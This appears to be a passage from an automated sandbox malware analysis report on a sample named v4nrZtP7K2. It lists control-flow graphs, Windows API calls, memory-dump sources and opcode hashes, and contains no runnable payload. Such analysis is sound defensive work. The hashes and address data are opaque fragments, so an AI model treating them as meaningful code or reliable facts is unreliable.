                                                                                      control_flow_graph 1834 37a30110-37a30176 1835 37a30181-37a30188 1834->1835 1836 37a30178-37a3017e 1834->1836 1837 37a30193-37a30232 CreateWindowExW 1835->1837 1838 37a3018a-37a30190 1835->1838 1836->1835 1840 37a30234-37a3023a 1837->1840 1841 37a3023b-37a30273 1837->1841 1838->1837 1840->1841 1845 37a30280 1841->1845 1846 37a30275-37a30278 1841->1846 1847 37a30281 1845->1847 1846->1845 1847->1847
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37A30222
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: 584d8218eee1534e5bcf2d05e6088ee4df3aa6ed369c1e13fdd220c410fcec42
                                                                                      • Instruction ID: 5569d5fa7af97275864af96cee604b201e8d3f8c9b8f13f60c5824f465e66846
                                                                                      • Opcode Fuzzy Hash: 584d8218eee1534e5bcf2d05e6088ee4df3aa6ed369c1e13fdd220c410fcec42
                                                                                      • Instruction Fuzzy Hash: AA41B2B5D0134DDFDB14CF99C884ADEBBB5BF88310F24812AE819AB210D775A945CF90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1848 37a31dc0-37a31dfc 1849 37a31e02-37a31e07 1848->1849 1850 37a31eac-37a31ecc 1848->1850 1851 37a31e5a-37a31e92 CallWindowProcW 1849->1851 1852 37a31e09-37a31e40 1849->1852 1856 37a31ecf-37a31edc 1850->1856 1854 37a31e94-37a31e9a 1851->1854 1855 37a31e9b-37a31eaa 1851->1855 1858 37a31e42-37a31e48 1852->1858 1859 37a31e49-37a31e58 1852->1859 1854->1855 1855->1856 1858->1859 1859->1856
                                                                                      APIs
                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 37A31E81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2714655100-0
                                                                                      • Opcode ID: 662a5f6d8e81feffdd18d8a54318f2dd055f60acbf730b85e3bbc5d29a111e86
                                                                                      • Instruction ID: 8878d7d88cd08ff4da36296931aae4bfc5cd33db7fd7824ed8e3780426cd445b
                                                                                      • Opcode Fuzzy Hash: 662a5f6d8e81feffdd18d8a54318f2dd055f60acbf730b85e3bbc5d29a111e86
                                                                                      • Instruction Fuzzy Hash: 684138B8900709DFDB14CF99C844AAABBF5FF88310F24C559E519AB321D775A841CFA0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1862 37a3d488-37a3d48d 1863 37a3d433-37a3d452 OleInitialize 1862->1863 1864 37a3d48f-37a3d4fe 1862->1864 1866 37a3d454-37a3d45a 1863->1866 1867 37a3d45b-37a3d478 1863->1867 1871 37a3d500-37a3d506 1864->1871 1872 37a3d507-37a3d51b 1864->1872 1866->1867 1871->1872
                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 37A3D445
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: 2d01125fa96713c7a5e5f2a0d8e93860d00934cf5918acac994ac89f4442cefd
                                                                                      • Instruction ID: c256cdd9bf03fa3e1a91adc6433b12d80ebcf82fcb3ad3dd7164dde794744d59
                                                                                      • Opcode Fuzzy Hash: 2d01125fa96713c7a5e5f2a0d8e93860d00934cf5918acac994ac89f4442cefd
                                                                                      • Instruction Fuzzy Hash: 6A2147B6C00648CFEB10CF9AD445BDEFBF4EB88224F10845AE858A7210D374A645CFA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1874 37a30bc0-37a30c5c DuplicateHandle 1876 37a30c65-37a30c82 1874->1876 1877 37a30c5e-37a30c64 1874->1877 1877->1876
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37A30C4F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 74b73002835b89e6edbbc23908f9f545135bbb01400c3a5ca3543cd448b7473c
                                                                                      • Instruction ID: 8be26e8eb32aa04d654eaf646f9946cc28bf93470d1788add5c366b2560534d3
                                                                                      • Opcode Fuzzy Hash: 74b73002835b89e6edbbc23908f9f545135bbb01400c3a5ca3543cd448b7473c
                                                                                      • Instruction Fuzzy Hash: E021E9B5901248AFDB10CF9AD584ADEFBF5EF48320F14841AE958A7350D374A940CF65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1880 36947c2c 1881 36947ceb-36947cfc 1880->1881 1882 36947d03-36947d0c 1881->1882 1883 36947cfe 1881->1883 1885 36947d12-36947d25 1882->1885 1886 36947ae3-36947b08 1882->1886 1883->1882 1889 36947d27 1885->1889 1890 36947d2c-36947d47 1885->1890 1887 36947b0f-36947b46 1886->1887 1888 36947b0a 1886->1888 1898 36947b4d-36947b7f 1887->1898 1899 36947b48 1887->1899 1888->1887 1889->1890 1891 36947d4e-36947d62 1890->1891 1892 36947d49 1890->1892 1896 36947d64 1891->1896 1897 36947d69-36947d7f LdrInitializeThunk 1891->1897 1892->1891 1896->1897 1900 36947d81-36947e7f 1897->1900 1905 36947b81-36947ba6 1898->1905 1906 36947be3-36947bf6 1898->1906 1899->1898 1903 36947e87-36947e91 1900->1903 1904 36947e81-36947e86 call 36941568 1900->1904 1904->1903 1910 36947bad-36947bdb 1905->1910 1911 36947ba8 1905->1911 1908 36947bfd-36947c22 1906->1908 1909 36947bf8 1906->1909 1915 36947c24-36947c25 1908->1915 1916 36947c31-36947c69 1908->1916 1909->1908 1910->1906 1911->1910 1915->1885 1917 36947c70-36947cd1 call 36947628 1916->1917 1918 36947c6b 1916->1918 1924 36947cd3 1917->1924 1925 36947cd8-36947cea 1917->1925 1918->1917 1924->1925 1925->1881
                                                                                      APIs
                                                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 36947D6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 09f0458a784abe4b1e3b9fefa3de0e1f577fb7cc9b180378039cb5aa056c123e
                                                                                      • Instruction ID: b16ee0bd8f5d8353c6337b4359fa6e876bf5b12c629e9f6e96127919059b2fcd
                                                                                      • Opcode Fuzzy Hash: 09f0458a784abe4b1e3b9fefa3de0e1f577fb7cc9b180378039cb5aa056c123e
                                                                                      • Instruction Fuzzy Hash: 22117F74E0021D9FEB05EFA8D888EEDB7B5FF88304F648156E804AB242D7719D41CB60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1927 37a30bc8-37a30c5c DuplicateHandle 1928 37a30c65-37a30c82 1927->1928 1929 37a30c5e-37a30c64 1927->1929 1929->1928
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37A30C4F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: ae7f0d5e3385e231f4a5b099b875e06778cc694788dda0517597d8b1ef85f5ee
                                                                                      • Instruction ID: 4ba23327af0956055005947d3f370c1a74312232b59bf513a4f3ce7f61b04b6f
                                                                                      • Opcode Fuzzy Hash: ae7f0d5e3385e231f4a5b099b875e06778cc694788dda0517597d8b1ef85f5ee
                                                                                      • Instruction Fuzzy Hash: 3E21F3B5901248AFDB10CFAAD984ADEFBF4FF48320F14841AE958A3310D374A940CFA5
                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 37A3D445
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: d596b07cf78332e47db479f2c630d06c596ed77ec0c12ccad8fb50cb0c844c6c
                                                                                      • Instruction ID: e3ed8d7ebdd28397556058c6820b3e2cc6a47294a3f50e583bb7936c191baff4
                                                                                      • Opcode Fuzzy Hash: d596b07cf78332e47db479f2c630d06c596ed77ec0c12ccad8fb50cb0c844c6c
                                                                                      • Instruction Fuzzy Hash: C21145B1800388CFDB10CFAAC485BDEFBF4EB48220F20845AE519A7700C374A541CFA6
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Timer
                                                                                      • String ID:
                                                                                      • API String ID: 2870079774-0
                                                                                      • Opcode ID: b84bdb14e0b5754271bf619c9bcd3b5e63e885892607bca9b1ab264933fafd96
                                                                                      • Instruction ID: 0c976d4eeaa07ee96c95df6414daf89c25292cce87e831c228cc63888fb4aa86
                                                                                      • Opcode Fuzzy Hash: b84bdb14e0b5754271bf619c9bcd3b5e63e885892607bca9b1ab264933fafd96
                                                                                      • Instruction Fuzzy Hash: D61125B58007499FDB10CF9AD885BDEFBF4FB48720F10841AE858A7640C375A984CFA1
                                                                                      APIs
                                                                                      • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,37A3D92F), ref: 37A3E72D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatchMessage
                                                                                      • String ID:
                                                                                      • API String ID: 2061451462-0
                                                                                      • Opcode ID: 82c068f4529e3d56a768a255aa761882a507f2e05cd9d11815dd31c12fc6ce84
                                                                                      • Instruction ID: 5a0eb14cbcaa6895fbcf39a78704284c5a71497dbb32a58b04e36bbae7bfbe51
                                                                                      • Opcode Fuzzy Hash: 82c068f4529e3d56a768a255aa761882a507f2e05cd9d11815dd31c12fc6ce84
                                                                                      • Instruction Fuzzy Hash: 6911F5B5C046499FDB10DF9AD445BDEFBF4EB48320F10852AE458A7700D374A544CFA5
                                                                                      APIs
                                                                                      • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,37A3D92F), ref: 37A3E72D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatchMessage
                                                                                      • String ID:
                                                                                      • API String ID: 2061451462-0
                                                                                      • Opcode ID: 86519871b46eb7e95571e74552fd014d548934d19536d43f6d63f4d1368d99c6
                                                                                      • Instruction ID: c483924b8986b78b8cd36ed982d705eb833a447d35941b62c87cd5ddf0a27f8c
                                                                                      • Opcode Fuzzy Hash: 86519871b46eb7e95571e74552fd014d548934d19536d43f6d63f4d1368d99c6
                                                                                      • Instruction Fuzzy Hash: 7711E0B5C047499FDB10CF9AD444BDEBBF4AB48220F10842AE969B7610D378A644CFA5
                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 37A3D445
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: aa5c874723f7a3842545f7926b874ccf298edaacaeb6a3e43a315bb7a9d9af44
                                                                                      • Instruction ID: 64143940ec6f895d1dc24421da9f62032af8b07219c5c903cae74ae1e9df1d1d
                                                                                      • Opcode Fuzzy Hash: aa5c874723f7a3842545f7926b874ccf298edaacaeb6a3e43a315bb7a9d9af44
                                                                                      • Instruction Fuzzy Hash: 451115B5904749CFEB10CFAAC545BDEBBF4EB48220F10845AE519B7300C779A944CFA5
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Timer
                                                                                      • String ID:
                                                                                      • API String ID: 2870079774-0
                                                                                      • Opcode ID: 936e2df9a953f3719d630f0ca896ce2988622ce9e0007e67d04e1876189a90ab
                                                                                      • Instruction ID: 4075a2ad89c49f1e38a2ba7776cc7930e4d4728c5e34872384485f7e13655570
                                                                                      • Opcode Fuzzy Hash: 936e2df9a953f3719d630f0ca896ce2988622ce9e0007e67d04e1876189a90ab
                                                                                      • Instruction Fuzzy Hash: 6C11D3B58003499FDB10CF9AD885BDEBBF8EB48320F10841AE959A7250C375A984CFA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: gV7
                                                                                      • API String ID: 0-849052430
                                                                                      • Opcode ID: c86f0452ca9493cfa65afd24b4014b254b8de8193f0e7c54089995d2f91c90e0
                                                                                      • Instruction ID: cd44c510ee16e713a94aa1e5348db653d72dffa6ee0cd0d18eb0936b5337a3bf
                                                                                      • Opcode Fuzzy Hash: c86f0452ca9493cfa65afd24b4014b254b8de8193f0e7c54089995d2f91c90e0
                                                                                      • Instruction Fuzzy Hash: 26712A75E00219CFDB09DFB9C8586ADBBB2FF88701F10852AE406AB350DB399942DF55
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: gV7
                                                                                      • API String ID: 0-849052430
                                                                                      • Opcode ID: 909317864089254e522f41c89338352ad7efd9be0c550b6ae2b6b1ff0595ded0
                                                                                      • Instruction ID: 786b9b78f771816573bec8d60d54810cd9b4630226bfdd10c77fe1c3ea1cc604
                                                                                      • Opcode Fuzzy Hash: 909317864089254e522f41c89338352ad7efd9be0c550b6ae2b6b1ff0595ded0
                                                                                      • Instruction Fuzzy Hash: 59315E75A00318CBDB19DF79C4646EEBBF6AF88710F14852AD406AB350DF399842DF61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: TkV7
                                                                                      • API String ID: 0-1979006197
                                                                                      • Opcode ID: 4c4df63b3a6dd191a9dd0c15a741b3e0f9bff3333ad5f12ee5c1242e9afe15f6
                                                                                      • Instruction ID: 18a309b209a7268f7f65c9e240601b68505415db3a1196d435ea13e9af1f82b0
                                                                                      • Opcode Fuzzy Hash: 4c4df63b3a6dd191a9dd0c15a741b3e0f9bff3333ad5f12ee5c1242e9afe15f6
                                                                                      • Instruction Fuzzy Hash: 5031A174A043058BEB2CCF76C8607AEBBF2AF88710F14852DC406A7641DB35E846CF62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: TkV7
                                                                                      • API String ID: 0-1979006197
                                                                                      • Opcode ID: 31bb2fbd63eb6296e740cdc366d594fa58add2df95d152cd707cd74c5c6183ff
                                                                                      • Instruction ID: 02575daa0a6fd7fa7503b13c8fc610285231c8ce1804161bb97b78bf5d0bc17d
                                                                                      • Opcode Fuzzy Hash: 31bb2fbd63eb6296e740cdc366d594fa58add2df95d152cd707cd74c5c6183ff
                                                                                      • Instruction Fuzzy Hash: A821C175A087458BE728CF76C5A06FEBBF2AF88310F14852DC446A7241DB75A845CF62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: jV7
                                                                                      • API String ID: 0-977473629
                                                                                      • Opcode ID: 152c3c029bce401f9e5e8870f73a3317a8f6ff7c8ffdb6f88b9925fd79cad71c
                                                                                      • Instruction ID: 2b22c2ab3038e7b0be1ebbeaaf985870728a6d602b4acf2aacc1401dbd44de9f
                                                                                      • Opcode Fuzzy Hash: 152c3c029bce401f9e5e8870f73a3317a8f6ff7c8ffdb6f88b9925fd79cad71c
                                                                                      • Instruction Fuzzy Hash: A3F02831E082289FDB04AF64C9107AF7BF1FB88320F00552AE41557640DB75E545CFD6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9f867ab1aee0d452a5b4ce4e9e3be4ecf89b18a795129e391307b1a422921253
                                                                                      • Instruction ID: 6d7e989c138e3a920da2cbda844c5f6fd4653ccef1ade8cbc045c16f2389570d
                                                                                      • Opcode Fuzzy Hash: 9f867ab1aee0d452a5b4ce4e9e3be4ecf89b18a795129e391307b1a422921253
                                                                                      • Instruction Fuzzy Hash: 8E42C3BAE6D7D58FC712CB306878295BFF1AB62214B1E4DCED0C192193D7A08486C767
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c88af2051d1f7ced8d89126b67815f3bde7becee16dd933f0e1fa0672543bad
                                                                                      • Instruction ID: 1683f368e66f9769bc1101e8289dd561dd2ff3d3ac9ee0c320dda74bda572d94
                                                                                      • Opcode Fuzzy Hash: 0c88af2051d1f7ced8d89126b67815f3bde7becee16dd933f0e1fa0672543bad
                                                                                      • Instruction Fuzzy Hash: D0B1CE347047108FDB259F24C858B7E7BE2AF89312F14852AE806CB3A5DB35CD46DBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78dbabfb2537cef22c4f2e190e7d1ad552d3bc5d410d6bd9ba66723e446db706
                                                                                      • Instruction ID: 08787504290fd02543d369c5317a718e0cd3c21ce85c564ac21ed7d8a5ac10a1
                                                                                      • Opcode Fuzzy Hash: 78dbabfb2537cef22c4f2e190e7d1ad552d3bc5d410d6bd9ba66723e446db706
                                                                                      • Instruction Fuzzy Hash: 6AE1B234A00218CFDB25DF60D954BEDBBB2FB89701F5085A9980A773A4CA356E82DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e884c292434fc17566609ced2afb2968cff0fade6f468298328497e0c2ed626
                                                                                      • Instruction ID: 3c9e1428a232a01d498d861fb1d667272fec1e81d2f88abd740c0c3c2b6d88eb
                                                                                      • Opcode Fuzzy Hash: 4e884c292434fc17566609ced2afb2968cff0fade6f468298328497e0c2ed626
                                                                                      • Instruction Fuzzy Hash: 42E1C234A00218CFDB25DF60D954BEDBBB2FB89701F5085A9D80A773A4CA356E82DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c614f200189475455217d86f7762ab33a32e1e2ac3ddc87be1a75e5edcb279b
                                                                                      • Instruction ID: 197a1adc06e89e441f60323e92e900f406e250813f2934ffe9768b58d5675e40
                                                                                      • Opcode Fuzzy Hash: 0c614f200189475455217d86f7762ab33a32e1e2ac3ddc87be1a75e5edcb279b
                                                                                      • Instruction Fuzzy Hash: 01819E34A00A058FCB54CF69D894AAEB7F2BF88316B64816AD805DB365DB31EC41CF61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c8ad0969ff88a55a40e1af798a78554e160bc7a76c0082332dc9364cd45db54
                                                                                      • Instruction ID: 08e732a70f0b24f451d148e77c2eb278a60b132cc18e8dcbebeadb2b33f339af
                                                                                      • Opcode Fuzzy Hash: 6c8ad0969ff88a55a40e1af798a78554e160bc7a76c0082332dc9364cd45db54
                                                                                      • Instruction Fuzzy Hash: 6CA1D674A1034DDFDB04DFA4E994A9DBBB2FB49711B108229E406AB365DF30AD06CF91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 679815ce75134e296b72723a42fdd3eb37d422616690280472ceb7f939d2ac74
                                                                                      • Instruction ID: b65d7028dba0013e08e36831fa8d0e9f65b740760df3cff28b9aea8d834878d3
                                                                                      • Opcode Fuzzy Hash: 679815ce75134e296b72723a42fdd3eb37d422616690280472ceb7f939d2ac74
                                                                                      • Instruction Fuzzy Hash: D57119347003058FCB54DF28C894A6E7BE6AF59740B1944AAE806CB3B1DB76EC41CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a77083e64256f74747153b30e91fcb80045827bcf2242bd97d84f024d3387d3b
                                                                                      • Instruction ID: 46e8edae5f30e46b19ad85c7432283598c4189d707306ec2f8bb0e48bf91053c
                                                                                      • Opcode Fuzzy Hash: a77083e64256f74747153b30e91fcb80045827bcf2242bd97d84f024d3387d3b
                                                                                      • Instruction Fuzzy Hash: E8A1B974A1020DDFDB04DFA4E995A9DBBB2FB49711B108229E406BB365DF30AD46CF80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d6904c8ae7308a71b46984a1539b585d2d494bb8eac4cd8659cc4a0cce4c0db
                                                                                      • Instruction ID: ea1b2ae8bde0e435abeda4ce12c4b437471a5dd376aec63ab14cd22c8d0aba61
                                                                                      • Opcode Fuzzy Hash: 6d6904c8ae7308a71b46984a1539b585d2d494bb8eac4cd8659cc4a0cce4c0db
                                                                                      • Instruction Fuzzy Hash: 8A71A1746083458EEB08CFB1DC687AE7FF6AB44794F044168E401BA2C2EB79D585CF66
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c0958c482db1f652d275ab03ee0f246a61f55ba694928da13052ca2b3324f3d
                                                                                      • Instruction ID: 332b4e2d52d1327824eb61e77bc3b6580102c3203c72023a33d30508a7f6b954
                                                                                      • Opcode Fuzzy Hash: 6c0958c482db1f652d275ab03ee0f246a61f55ba694928da13052ca2b3324f3d
                                                                                      • Instruction Fuzzy Hash: A281A174E012689FEB65DF25D990BDDBBB2BB89700F1080EAD909A7250DB306E81CF44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a26dbd59876675eac6e0f5e4381f8c2a0f53b4b1dbfb311e1653b7e4ad1d8f7
                                                                                      • Instruction ID: 207339fe31ac4fd9bf72bc28a1de1c8e673ea4bd8e81584056fc7e156a3cf3fc
